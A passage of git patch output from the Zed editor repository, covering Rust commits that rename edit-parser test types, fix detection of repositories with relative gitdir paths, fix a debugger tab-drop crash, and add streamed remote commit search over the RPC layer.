-855,12 +860,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: " old text".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "replacement".into(), done: true, @@ -871,7 +876,7 @@ mod tests { #[test] fn test_finalize_with_partially_seen_new_text() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); parser.push_edits(&[PartialEdit { old_text: Some("old".into()), @@ -884,7 +889,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: " new text".into(), done: true, @@ -894,7 +899,7 @@ mod tests { #[test] fn test_repeated_pushes_with_no_change() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_edits(&[PartialEdit { old_text: Some("stable".into()), @@ -919,7 +924,7 @@ mod tests { #[test] fn test_old_text_trailing_backslash_held_back() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Partial-json-fixer produces a literal backslash when the JSON stream // cuts in the middle of an escape sequence like \n. The parser holds @@ -931,7 +936,7 @@ mod tests { // The trailing `\` is held back — only "hello," is emitted. 
assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "hello,".into(), done: false, @@ -955,7 +960,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "\nworld".into(), done: false, @@ -965,7 +970,7 @@ mod tests { #[test] fn test_multiline_old_and_new_text() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_edits(&[PartialEdit { old_text: Some("line1\nline2".into()), @@ -973,7 +978,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "line1\nline2".into(), done: false, @@ -987,12 +992,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "\nline3".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "LINE1".into(), done: false, @@ -1006,7 +1011,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: "\nLINE2\nLINE3".into(), done: false, From de8153b82646baf0bf7caebeb13cd95b4f754de9 Mon Sep 17 00:00:00 2001 From: Max Brunsfeld Date: Mon, 4 May 2026 09:20:25 -0700 Subject: [PATCH 166/231] Fix handling of git repositories with an external git directory (#55402) Closes https://github.com/zed-industries/zed/issues/54824 Previously, we always assumed that `gitdir` was an absolute path. Also, we did not correctly handle custom gitignore files that were configured via separate git directories. Release Notes: - Fixed failure to recognize git repositories where `gitdir` was expressed as a relative path. - Fixed handling of gitignores in git repositories that use a separate git dir. 
--- crates/worktree/src/worktree.rs | 122 ++++--- crates/worktree/tests/integration/main.rs | 414 +++++++++++++++------- 2 files changed, 353 insertions(+), 183 deletions(-) diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index dc1f208fac7067..974219bf9bca4d 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -3964,19 +3964,22 @@ impl BackgroundScanner { let repo = if scanning_enabled { let (ignores, exclude, repo) = discover_ancestor_git_repo(self.fs.clone(), &root_abs_path).await; - self.state - .lock() - .await - .snapshot - .ignores_by_parent_abs_path - .extend(ignores); + let mut state = self.state.lock().await; + state.snapshot.ignores_by_parent_abs_path.extend(ignores); if let Some(exclude) = exclude { - self.state - .lock() - .await + let work_directory_abs_path: Arc = repo + .as_ref() + .map(|(_, work_directory)| { + state + .snapshot + .work_directory_abs_path(work_directory) + .into() + }) + .unwrap_or_else(|| root_abs_path.as_path().into()); + state .snapshot .repo_exclude_by_work_dir_abs_path - .insert(root_abs_path.as_path().into(), (exclude, false)); + .insert(work_directory_abs_path, (exclude, false)); } repo @@ -5078,12 +5081,8 @@ impl BackgroundScanner { state.snapshot.ignores_by_parent_abs_path.extend(ignores); if let Some((ancestor_dot_git, work_directory)) = repo { if let Some(exclude) = exclude { - let work_directory_abs_path = self - .state - .lock() - .await - .snapshot - .work_directory_abs_path(&work_directory); + let work_directory_abs_path = + state.snapshot.work_directory_abs_path(&work_directory); state .snapshot @@ -5201,7 +5200,11 @@ impl BackgroundScanner { if *needs_update { *needs_update = false; - ignores_to_update.push(work_dir_abs_path.clone()); + if work_dir_abs_path.starts_with(abs_path.as_path()) { + ignores_to_update.push(work_dir_abs_path.clone()); + } else { + ignores_to_update.push(abs_path.as_path().into()); + } if let Some((_, repository)) = repository { 
let exclude_abs_path = repository.common_dir_abs_path.join(REPO_EXCLUDE); @@ -5543,39 +5546,45 @@ async fn discover_ancestor_git_repo( .await .is_ok_and(|metadata| metadata.is_some()) { - if index != 0 { + let dot_git_abs_path = if index != 0 { // We canonicalize, since the FS events use the canonicalized path. - if let Some(ancestor_dot_git) = fs.canonicalize(&ancestor_dot_git).await.log_err() { - let location_in_repo = root_abs_path - .as_path() - .strip_prefix(ancestor) - .unwrap() - .into(); - log::info!("inserting parent git repo for this worktree: {location_in_repo:?}"); - // We associate the external git repo with our root folder and - // also mark where in the git repo the root folder is located. - return ( - ignores, - exclude, - Some(( - ancestor_dot_git, - WorkDirectory::AboveProject { - absolute_path: ancestor.into(), - location_in_repo, - }, - )), - ); - }; - } + match fs.canonicalize(&ancestor_dot_git).await.log_err() { + Some(path) => path, + None => continue, + } + } else { + ancestor_dot_git.clone() + }; + let dot_git_abs_path: Arc = dot_git_abs_path.as_path().into(); + let (_, common_dir_abs_path) = discover_git_paths(&dot_git_abs_path, fs.as_ref()).await; - let dot_git_path: Arc = ancestor_dot_git.into(); - let (_, common_dir_abs_path) = discover_git_paths(&dot_git_path, fs.as_ref()).await; let repo_exclude_abs_path = common_dir_abs_path.join(REPO_EXCLUDE); if let Ok(repo_exclude) = build_gitignore(&repo_exclude_abs_path, fs.as_ref()).await { exclude = Some(Arc::new(repo_exclude)); } - // Reached root of git repository. + if index != 0 { + let location_in_repo = root_abs_path + .as_path() + .strip_prefix(ancestor) + .unwrap() + .into(); + log::info!("inserting parent git repo for this worktree: {location_in_repo:?}"); + // We associate the external git repo with our root folder and + // also mark where in the git repo the root folder is located. 
+ return ( + ignores, + exclude, + Some(( + dot_git_abs_path.as_ref().into(), + WorkDirectory::AboveProject { + absolute_path: ancestor.into(), + location_in_repo, + }, + )), + ); + } + break; } } @@ -6285,6 +6294,26 @@ fn parse_gitfile(content: &str) -> anyhow::Result<&Path> { Ok(Path::new(path.trim())) } +fn resolve_gitfile_path(dot_git_abs_path: &Path, gitfile_path: &Path) -> PathBuf { + if gitfile_path.is_absolute() { + gitfile_path.into() + } else { + dot_git_abs_path + .parent() + .unwrap_or_else(|| Path::new("")) + .join(gitfile_path) + } +} + +fn resolve_commondir_path(repository_dir_abs_path: &Path, commondir_path: &str) -> PathBuf { + let commondir_path = Path::new(commondir_path.trim()); + if commondir_path.is_absolute() { + commondir_path.into() + } else { + repository_dir_abs_path.join(commondir_path) + } +} + pub async fn discover_root_repo_common_dir(root_abs_path: &Path, fs: &dyn Fs) -> Option> { let root_dot_git = root_abs_path.join(DOT_GIT); if !fs.metadata(&root_dot_git).await.is_ok_and(|m| m.is_some()) { @@ -6306,17 +6335,14 @@ async fn discover_git_paths(dot_git_abs_path: &Arc, fs: &dyn Fs) -> (Arc

Date: Mon, 4 May 2026 10:22:19 -0600 Subject: [PATCH 167/231] Remove Flatpak warning now that sandboxing is reverted (#55673) Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- docs/src/linux.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/src/linux.md b/docs/src/linux.md index b15db66d8da44a..6ebb179db3389b 100644 --- a/docs/src/linux.md +++ b/docs/src/linux.md @@ -53,7 +53,7 @@ There are several third-party Zed packages for various Linux distributions and p - Parabola: [`zed`](https://www.parabola.nu/packages/extra/x86_64/zed/) - ALT Linux (Sisyphus): [`zed`](https://packages.altlinux.org/en/sisyphus/srpms/zed/) - AOSC OS: [`zed`](https://packages.aosc.io/packages/zed) -- Flathub: [`dev.zed.Zed`](https://flathub.org/apps/dev.zed.Zed) (WARNING: [Sandboxing causes problems](https://github.com/flathub/dev.zed.Zed/pull/275)) +- Flathub: [`dev.zed.Zed`](https://flathub.org/apps/dev.zed.Zed) See [Repology](https://repology.org/project/zed-editor/versions) for a list of Zed packages in various repositories. From 95cb0fac6c5bdb1933a04d685a78d8763f66860a Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 18:31:27 +0200 Subject: [PATCH 168/231] debugger_ui: Fix debugger tab drop crash (#55667) Avoid reading the source debugger pane during SubView drop handling because it may be the Pane currently being updated. Use the DraggedTab item handle to validate the drop and capture the item id, leaving source-pane reads to the deferred move. Add a regression test for a stale SubView host pane during tab drop. 
Fixes ZED-74F Release Notes: - N/A or Added/Fixed/Improved ... --- crates/debugger_ui/src/session/running.rs | 106 ++++++++++++++++++++-- 1 file changed, 98 insertions(+), 8 deletions(-) diff --git a/crates/debugger_ui/src/session/running.rs b/crates/debugger_ui/src/session/running.rs index c273778ec38527..c496aa193a92d9 100644 --- a/crates/debugger_ui/src/session/running.rs +++ b/crates/debugger_ui/src/session/running.rs @@ -323,20 +323,15 @@ impl Item for SubView { let Some(this_pane) = self.host_pane.upgrade() else { return true; }; - let item = if tab.pane == this_pane { - active_pane.item_for_index(tab.ix) - } else { - tab.pane.read(cx).item_for_index(tab.ix) - }; - let Some(item) = item.filter(|item| item.downcast::().is_some()) else { + if tab.item.downcast::().is_none() { return true; - }; + } let Some(split_direction) = active_pane.drag_split_direction() else { return false; }; let source = tab.pane.clone(); - let item_id_to_move = item.item_id(); + let item_id_to_move = tab.item.item_id(); let weak_running = self.running_state.clone(); // Source pane may be the one currently updated, so defer the move. 
@@ -1980,3 +1975,98 @@ impl Focusable for RunningState { self.focus_handle.clone() } } + +#[cfg(test)] +mod tests { + use super::*; + use crate::{ + debugger_panel::DebugPanel, + tests::{init_test, init_test_workspace, start_debug_session}, + }; + use gpui::{BackgroundExecutor, TestAppContext, VisualTestContext}; + use project::{FakeFs, Project}; + use serde_json::json; + use util::path; + + #[gpui::test] + async fn stale_subview_host_during_tab_drop_does_not_read_updating_source_pane( + executor: BackgroundExecutor, + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(executor); + fs.insert_tree( + path!("/project"), + json!({ + "main.rs": "fn main() {}", + }), + ) + .await; + + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + let workspace = init_test_workspace(&project, cx).await; + let cx = &mut VisualTestContext::from_window(*workspace, cx); + + start_debug_session(&workspace, cx, |_| {}).expect("debug session starts"); + cx.run_until_parked(); + + let running_state = workspace + .update(cx, |multi_workspace, _window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + let debug_panel = workspace.panel::(cx).expect("debug panel"); + let active_session = debug_panel + .read(cx) + .active_session() + .expect("active debug session"); + active_session.read(cx).running_state().clone() + }) + }) + .expect("workspace update succeeds"); + + let (source_pane, stale_host_pane) = running_state.read_with(cx, |running_state, _| { + let panes = running_state.panes.panes(); + let mut panes = panes.into_iter(); + let source_pane = panes.next().expect("source pane").clone(); + let stale_host_pane = panes.next().expect("stale host pane").clone(); + (source_pane, stale_host_pane) + }); + + let dragged_tab = { + let source_pane_entity = source_pane.clone(); + source_pane.read_with(cx, |source_pane, _| { + let item = source_pane + .item_for_index(0) + .expect("source pane contains debugger subview") + .boxed_clone(); + 
DraggedTab { + pane: source_pane_entity, + item, + ix: 0, + detail: 0, + is_active: true, + } + }) + }; + + let active_subview = source_pane.read_with(cx, |source_pane, _| { + source_pane + .active_item() + .and_then(|item| item.downcast::()) + .expect("active item is a debugger subview") + }); + active_subview.update(cx, |subview, _| { + subview.set_host_pane(stale_host_pane.downgrade()); + }); + + source_pane.update_in(cx, |source_pane, window, cx| { + source_pane.handle_tab_drop( + &dragged_tab, + source_pane.active_item_index(), + true, + window, + cx, + ); + }); + } +} From 3cf816c91c34d1bc15dfeece3034908c63f56bb5 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Mon, 4 May 2026 12:38:14 -0400 Subject: [PATCH 169/231] git_graph: Add remote support for search operations (#55167) ### Motivation This is the second of three PRs to add remote/collab support for the git graph and is a follow-up to #54468. I'm adding remote support for the search because it's not user accessible without the initial graph fetch having remote support, so it allows us to merge this without having to add full remote support. Collab guest support will be added in a follow-up PR. #### Summary For large repos, searching can take a while to fully stream in all matched results. For example, running a basic search on the Linux repo took over 10s for me. Because of that, we want to stream search results in chunks to downstream users to keep the time-to-first-match low. After this change, the first chunk gets sent back after ~50ms on the Linux repo from receiving the request. In order to accomplish that, I added a new proto client API that allows for a request to map to n responses. e.g. 
```/dev/null/example.rs#L1-1 client.add_entity_stream_request_handler(Self::handle_search_commits); ``` Note: The proto API isn't supported over collab yet, that will be another PR Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --------- Co-authored-by: cameron --- crates/client/src/client.rs | 29 ++ crates/fs/src/fake_git_repo.rs | 39 +- crates/project/src/git_store.rs | 132 +++++- crates/proto/proto/git.proto | 23 + crates/proto/proto/zed.proto | 4 +- crates/proto/src/proto.rs | 4 + crates/remote/src/remote_client.rs | 228 +++++++++- .../remote_server/src/remote_editing_tests.rs | 109 ++++- crates/rpc/src/peer.rs | 412 ++++++++++++++++-- crates/rpc/src/proto_client.rs | 96 +++- 10 files changed, 1016 insertions(+), 60 deletions(-) diff --git a/crates/client/src/client.rs b/crates/client/src/client.rs index 95f57a6279727c..5bc34320a87e1a 100644 --- a/crates/client/src/client.rs +++ b/crates/client/src/client.rs @@ -24,6 +24,7 @@ use futures::{ AsyncReadExt, FutureExt, SinkExt, Stream, StreamExt, TryFutureExt as _, TryStreamExt, channel::{mpsc, oneshot}, future::BoxFuture, + stream::BoxStream, }; use gpui::{App, AsyncApp, Entity, Global, Task, WeakEntity, actions}; use http_client::{HttpClient, HttpClientWithUrl, http, read_proxy_from_env}; @@ -1789,6 +1790,34 @@ impl ProtoClient for Client { self.request_dynamic(envelope, request_type).boxed() } + fn request_stream( + &self, + envelope: proto::Envelope, + request_type: &'static str, + ) -> BoxFuture<'static, Result>>> { + let client_id = self.id(); + let response = self.connection_id().map(|connection_id| { + self.peer + 
.request_stream_dynamic(connection_id, envelope, request_type) + }); + + async move { + log::debug!( + "rpc stream request start. client_id:{}. name:{}", + client_id, + request_type + ); + let response = response?.await; + log::debug!( + "rpc stream request opened. client_id:{}. name:{}", + client_id, + request_type + ); + response + } + .boxed() + } + fn send(&self, envelope: proto::Envelope, message_type: &'static str) -> Result<()> { log::debug!("rpc send. client_id:{}, name:{}", self.id(), message_type); let connection_id = self.connection_id()?; diff --git a/crates/fs/src/fake_git_repo.rs b/crates/fs/src/fake_git_repo.rs index 309b6a84a650a8..5f2cb0515ce757 100644 --- a/crates/fs/src/fake_git_repo.rs +++ b/crates/fs/src/fake_git_repo.rs @@ -1435,10 +1435,43 @@ impl GitRepository for FakeGitRepository { fn search_commits( &self, _log_source: LogSource, - _search_args: SearchCommitArgs, - _request_tx: Sender, + search_args: SearchCommitArgs, + request_tx: Sender, ) -> BoxFuture<'_, Result<()>> { - async { bail!("search_commits not supported for FakeGitRepository") }.boxed() + async move { + let query = if search_args.case_sensitive { + search_args.query.to_string() + } else { + search_args.query.to_lowercase() + }; + + let matching_shas = self.fs.with_git_state(&self.dot_git_path, false, |state| { + state + .commit_data + .iter() + .filter_map(|(sha, entry)| { + let FakeCommitDataEntry::Success(commit_data) = entry else { + return None; + }; + let message = if search_args.case_sensitive { + commit_data.message.to_string() + } else { + commit_data.message.to_lowercase() + }; + message.contains(&query).then_some(*sha) + }) + .collect::>() + })?; + + for sha in matching_shas { + if request_tx.send(sha).await.is_err() { + break; + } + } + + Ok(()) + } + .boxed() } fn commit_data_reader(&self) -> Result { diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index b30b943d032737..f5dd3bef95c033 100644 --- a/crates/project/src/git_store.rs +++ 
b/crates/project/src/git_store.rs @@ -20,7 +20,7 @@ use collections::HashMap; pub use conflict_set::{ConflictRegion, ConflictSet, ConflictSetSnapshot, ConflictSetUpdate}; use fs::{Fs, RemoveOptions}; use futures::{ - FutureExt, StreamExt, + FutureExt, SinkExt, Stream, StreamExt, channel::{ mpsc, oneshot::{self, Canceled}, @@ -680,6 +680,7 @@ impl GitStore { client.add_entity_request_handler(Self::handle_edit_ref); client.add_entity_request_handler(Self::handle_repair_worktrees); client.add_entity_request_handler(Self::handle_get_commit_data); + client.add_entity_stream_request_handler(Self::handle_search_commits); } pub fn is_local(&self) -> bool { @@ -2669,6 +2670,63 @@ impl GitStore { Ok(proto::GetCommitDataResponse { commits }) } + async fn handle_search_commits( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result>> { + const CHUNK_SIZE: usize = 100; + + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + let log_source = log_source_from_proto( + envelope + .payload + .log_source + .context("missing search commit log source")?, + )?; + let search_args = SearchCommitArgs { + query: SharedString::from(envelope.payload.query), + case_sensitive: envelope.payload.case_sensitive, + }; + + let (request_tx, request_rx) = async_channel::unbounded(); + repository_handle.update(&mut cx, |repository, cx| { + repository.search_commits(log_source, search_args, request_tx, cx); + }); + + let (mut response_tx, response_rx) = mpsc::unbounded(); + cx.background_spawn(async move { + let mut shas = Vec::new(); + + while let Ok(sha) = request_rx.recv().await { + shas.push(sha.to_string()); + + if shas.len() >= CHUNK_SIZE { + if response_tx + .send(Ok(proto::SearchCommitsResponse { + shas: mem::take(&mut shas), + })) + .await + .is_err() + { + return; + } + } + } + + if !shas.is_empty() { + response_tx + .send(Ok(proto::SearchCommitsResponse { 
shas })) + .await + .ok(); + } + }) + .detach(); + + Ok(response_rx) + } + async fn handle_edit_ref( this: Entity, envelope: TypedEnvelope, @@ -4974,6 +5032,7 @@ impl Repository { cx: &mut Context, ) { let repository_state = self.repository_state.clone(); + let repository_id = self.id; cx.background_spawn(async move { let repo_state = repository_state.await; @@ -4985,8 +5044,50 @@ impl Repository { .await .log_err(); } - Ok(RepositoryState::Remote(_)) => {} - Err(_) => {} + + Ok(RepositoryState::Remote(RemoteRepositoryState { client, project_id })) => { + let result = client + .request_stream(proto::SearchCommits { + project_id: project_id.to_proto(), + repository_id: repository_id.to_proto(), + log_source: Some(log_source_to_proto(&log_source)), + query: search_args.query.to_string(), + case_sensitive: search_args.case_sensitive, + }) + .await; + + let mut stream = match result { + Ok(stream) => stream, + Err(error) => { + log::error!("failed to search commits remotely: {error:?}"); + return; + } + }; + + while let Some(response) = stream.next().await { + let response = match response { + Ok(response) => response, + Err(error) => { + log::error!( + "failed to receive remote commit search results: {error:?}" + ); + return; + } + }; + + for sha in &response.shas { + let Ok(oid) = Oid::from_str(sha) else { + return; + }; + if request_tx.send(oid).await.is_err() { + return; + } + } + } + } + Err(error) => { + log::error!("failed to get repository state for commit search: {error}"); + } }; }) .detach(); @@ -8119,6 +8220,31 @@ fn deserialize_blame_buffer_response( Some(Blame { entries, messages }) } +fn log_source_to_proto(log_source: &LogSource) -> proto::GitLogSource { + proto::GitLogSource { + source: Some(match log_source { + LogSource::All => proto::git_log_source::Source::All(proto::GitLogSourceAll {}), + LogSource::Branch(branch) => proto::git_log_source::Source::Branch(branch.to_string()), + LogSource::Sha(sha) => 
proto::git_log_source::Source::Sha(sha.to_string()), + LogSource::Path(path) => proto::git_log_source::Source::Path(path.to_proto()), + }), + } +} + +fn log_source_from_proto(log_source: proto::GitLogSource) -> Result { + match log_source + .source + .context("git log source is missing source")? + { + proto::git_log_source::Source::All(_) => Ok(LogSource::All), + proto::git_log_source::Source::Branch(branch) => Ok(LogSource::Branch(branch.into())), + proto::git_log_source::Source::Sha(sha) => Ok(LogSource::Sha(Oid::from_str(&sha)?)), + proto::git_log_source::Source::Path(path) => { + Ok(LogSource::Path(RepoPath::from_proto(&path)?)) + } + } +} + fn commit_data_to_proto(commit: &CommitData) -> proto::CommitData { proto::CommitData { sha: commit.sha.to_string(), diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index cea288ea2a0b7a..afea6cf34a3eaa 100644 --- a/crates/proto/proto/git.proto +++ b/crates/proto/proto/git.proto @@ -693,3 +693,26 @@ message CommitData { message GetCommitDataResponse { repeated CommitData commits = 1; } + +message GitLogSourceAll {} + +message GitLogSource { + oneof source { + GitLogSourceAll all = 1; + string branch = 2; + string sha = 3; + string path = 4; + } +} + +message SearchCommits { + uint64 project_id = 1; + uint64 repository_id = 2; + GitLogSource log_source = 3; + string query = 4; + bool case_sensitive = 5; +} + +message SearchCommitsResponse { + repeated string shas = 1; +} diff --git a/crates/proto/proto/zed.proto b/crates/proto/proto/zed.proto index 28626e687a8f90..0c149fb2976844 100644 --- a/crates/proto/proto/zed.proto +++ b/crates/proto/proto/zed.proto @@ -480,7 +480,9 @@ message Envelope { GitCreateArchiveCheckpointResponse git_create_archive_checkpoint_response = 445; GitRestoreArchiveCheckpoint git_restore_archive_checkpoint = 446; GetCommitData get_commit_data = 447; - GetCommitDataResponse get_commit_data_response = 448; // current max + GetCommitDataResponse get_commit_data_response = 448; + 
SearchCommits search_commits = 449; + SearchCommitsResponse search_commits_response = 450; // current max } reserved 87 to 88; diff --git a/crates/proto/src/proto.rs b/crates/proto/src/proto.rs index 06a4b2b5cc044d..651e11354a9d36 100644 --- a/crates/proto/src/proto.rs +++ b/crates/proto/src/proto.rs @@ -358,6 +358,8 @@ messages!( (GitRepairWorktrees, Background), (GetCommitData, Background), (GetCommitDataResponse, Background), + (SearchCommits, Background), + (SearchCommitsResponse, Background), (GitWorktreesResponse, Background), (GitCreateWorktree, Background), (GitRemoveWorktree, Background), @@ -573,6 +575,7 @@ request_messages!( (GitEditRef, Ack), (GitRepairWorktrees, Ack), (GetCommitData, GetCommitDataResponse), + (SearchCommits, SearchCommitsResponse), (GitCreateWorktree, Ack), (GitRemoveWorktree, Ack), (GitRenameWorktree, Ack), @@ -767,6 +770,7 @@ entity_messages!( GitEditRef, GitRepairWorktrees, GetCommitData, + SearchCommits, GitCreateArchiveCheckpoint, GitRestoreArchiveCheckpoint, GitCreateWorktree, diff --git a/crates/remote/src/remote_client.rs b/crates/remote/src/remote_client.rs index a32d5dc75c7fcb..138238c5fd45cd 100644 --- a/crates/remote/src/remote_client.rs +++ b/crates/remote/src/remote_client.rs @@ -22,6 +22,7 @@ use futures::{ }, future::{BoxFuture, Shared, WeakShared}, select, select_biased, + stream::BoxStream, }; use gpui::{ App, AppContext as _, AsyncApp, BackgroundExecutor, BorrowAppContext, Context, Entity, @@ -1320,6 +1321,8 @@ impl RemoteConnectionOptions { #[cfg(test)] mod tests { use super::*; + use gpui::TestAppContext; + use rpc::{ErrorCodeExt, proto::ErrorCode}; #[test] fn test_ssh_display_name_prefers_nickname() { @@ -1341,6 +1344,137 @@ mod tests { assert_eq!(options.display_name(), "1.2.3.4"); } + + #[gpui::test] + async fn test_channel_client_request_stream_terminates_on_error(cx: &mut TestAppContext) { + let (incoming_tx, incoming_rx) = mpsc::unbounded::(); + let (outgoing_tx, mut outgoing_rx) = mpsc::unbounded::(); + + 
let client = + cx.update(|cx| ChannelClient::new(incoming_rx, outgoing_tx, cx, "test-client", false)); + + // The client sends RemoteStarted on startup; drain the outgoing channel + // so it doesn't block. + let _drain_outgoing = cx + .executor() + .spawn(async move { while outgoing_rx.next().await.is_some() {} }); + + let mut stream = client + .request_stream_dynamic(proto::Test { id: 0 }.into_envelope(0, None, None), "Test") + .await + .unwrap(); + + let request_id = 0; + + incoming_tx + .unbounded_send(proto::Test { id: 1 }.into_envelope(100, Some(request_id), None)) + .unwrap(); + + let first = stream.next().await.unwrap().unwrap(); + assert_eq!( + proto::Test::from_envelope(first).unwrap(), + proto::Test { id: 1 } + ); + + // Send an Error without a trailing EndStream. The Error alone should + // terminate the stream. + incoming_tx + .unbounded_send( + ErrorCode::Internal + .message("boom".to_string()) + .to_proto() + .into_envelope(101, Some(request_id), None), + ) + .unwrap(); + + let second = stream.next().await.unwrap(); + let error = second.unwrap_err(); + assert!( + format!("{error}").contains("boom"), + "expected error to surface server message, got: {error}" + ); + + assert!(stream.next().await.is_none()); + assert_eq!(client.stream_response_channels.lock().len(), 0); + } + + #[gpui::test] + async fn test_channel_client_dropping_stream_request_before_response_cleans_up_channel( + cx: &mut TestAppContext, + ) { + let (_incoming_tx, incoming_rx) = mpsc::unbounded::(); + let (outgoing_tx, mut outgoing_rx) = mpsc::unbounded::(); + + let client = + cx.update(|cx| ChannelClient::new(incoming_rx, outgoing_tx, cx, "test-client", false)); + + let _drain_outgoing = cx + .executor() + .spawn(async move { while outgoing_rx.next().await.is_some() {} }); + + let stream = client + .request_stream_dynamic(proto::Test { id: 0 }.into_envelope(0, None, None), "Test") + .await + .unwrap(); + + assert_eq!(client.stream_response_channels.lock().len(), 1); + + drop(stream); 
+ cx.run_until_parked(); + + assert_eq!( + client.stream_response_channels.lock().len(), + 0, + "dropping a stream before any responses arrive should remove response channel bookkeeping" + ); + } + + #[gpui::test] + async fn test_channel_client_dropping_stream_request_before_completion( + cx: &mut TestAppContext, + ) { + let (incoming_tx, incoming_rx) = mpsc::unbounded::(); + let (outgoing_tx, mut outgoing_rx) = mpsc::unbounded::(); + + let client = + cx.update(|cx| ChannelClient::new(incoming_rx, outgoing_tx, cx, "test-client", false)); + + let _drain_outgoing = cx + .executor() + .spawn(async move { while outgoing_rx.next().await.is_some() {} }); + + let mut stream = client + .request_stream_dynamic(proto::Test { id: 0 }.into_envelope(0, None, None), "Test") + .await + .unwrap(); + + let request_id = 0; + + incoming_tx + .unbounded_send(proto::Test { id: 1 }.into_envelope(100, Some(request_id), None)) + .unwrap(); + let _ = stream.next().await.unwrap().unwrap(); + + assert_eq!(client.stream_response_channels.lock().len(), 1); + + drop(stream); + + // Inject an orphaned non-terminal response. The read loop should detect + // that the consumer has been dropped and clean up its bookkeeping (no + // EndStream sent here on purpose, otherwise the cleanup would happen + // via the terminal-response path and mask the bug under test). 
+ incoming_tx + .unbounded_send(proto::Test { id: 2 }.into_envelope(101, Some(request_id), None)) + .unwrap(); + + cx.run_until_parked(); + + assert_eq!( + client.stream_response_channels.lock().len(), + 0, + "stream channel should be removed once the consumer has dropped the stream" + ); + } } impl From for RemoteConnectionOptions { @@ -1418,6 +1552,8 @@ pub trait RemoteConnection: Send + Sync { } type ResponseChannels = Mutex)>>>; +type StreamResponseChannels = + Arc, oneshot::Sender<()>)>>>>; struct Signal { tx: Mutex>>, @@ -1455,6 +1591,7 @@ pub(crate) struct ChannelClient { outgoing_tx: Mutex>, buffer: Mutex>, response_channels: ResponseChannels, + stream_response_channels: StreamResponseChannels, message_handlers: Mutex, max_received: AtomicU32, name: &'static str, @@ -1477,6 +1614,7 @@ impl ChannelClient { next_message_id: AtomicU32::new(0), max_received: AtomicU32::new(0), response_channels: ResponseChannels::default(), + stream_response_channels: StreamResponseChannels::default(), message_handlers: Default::default(), buffer: Mutex::new(VecDeque::new()), name, @@ -1550,13 +1688,40 @@ impl ChannelClient { if let Some(request_id) = incoming.responding_to { let request_id = MessageId(request_id); + // An incoming response with no payload is malformed; drop + // it. The request future and any stream consumers will + // remain pending until either a real response arrives or + // the connection is torn down. 
+ if incoming.payload.is_none() { + continue; + } let sender = this.response_channels.lock().remove(&request_id); if let Some(sender) = sender { let (tx, rx) = oneshot::channel(); - if incoming.payload.is_some() { - sender.send((incoming, tx)).ok(); - } + sender.send((incoming, tx)).ok(); rx.await.ok(); + } else { + let terminal_stream_response = matches!( + &incoming.payload, + Some(proto::envelope::Payload::Error(_)) + | Some(proto::envelope::Payload::EndStream(_)) + ); + let sender = if terminal_stream_response { + this.stream_response_channels.lock().remove(&request_id) + } else { + this.stream_response_channels + .lock() + .get(&request_id) + .cloned() + }; + if let Some(sender) = sender { + let (tx, rx) = oneshot::channel(); + if sender.unbounded_send((Ok(incoming), tx)).is_err() { + this.stream_response_channels.lock().remove(&request_id); + continue; + } + rx.await.ok(); + } } } else if let Some(envelope) = build_typed_envelope(peer_id, Instant::now(), incoming) @@ -1721,6 +1886,55 @@ impl ChannelClient { } } + fn request_stream_dynamic( + &self, + mut envelope: proto::Envelope, + type_name: &'static str, + ) -> impl 'static + Future>>> { + envelope.id = self.next_message_id.fetch_add(1, SeqCst); + let message_id = MessageId(envelope.id); + let (tx, rx) = mpsc::unbounded(); + let stream_response_channels = self.stream_response_channels.clone(); + stream_response_channels.lock().insert(message_id, tx); + + let result = self.send_buffered(envelope); + async move { + if let Err(error) = &result { + 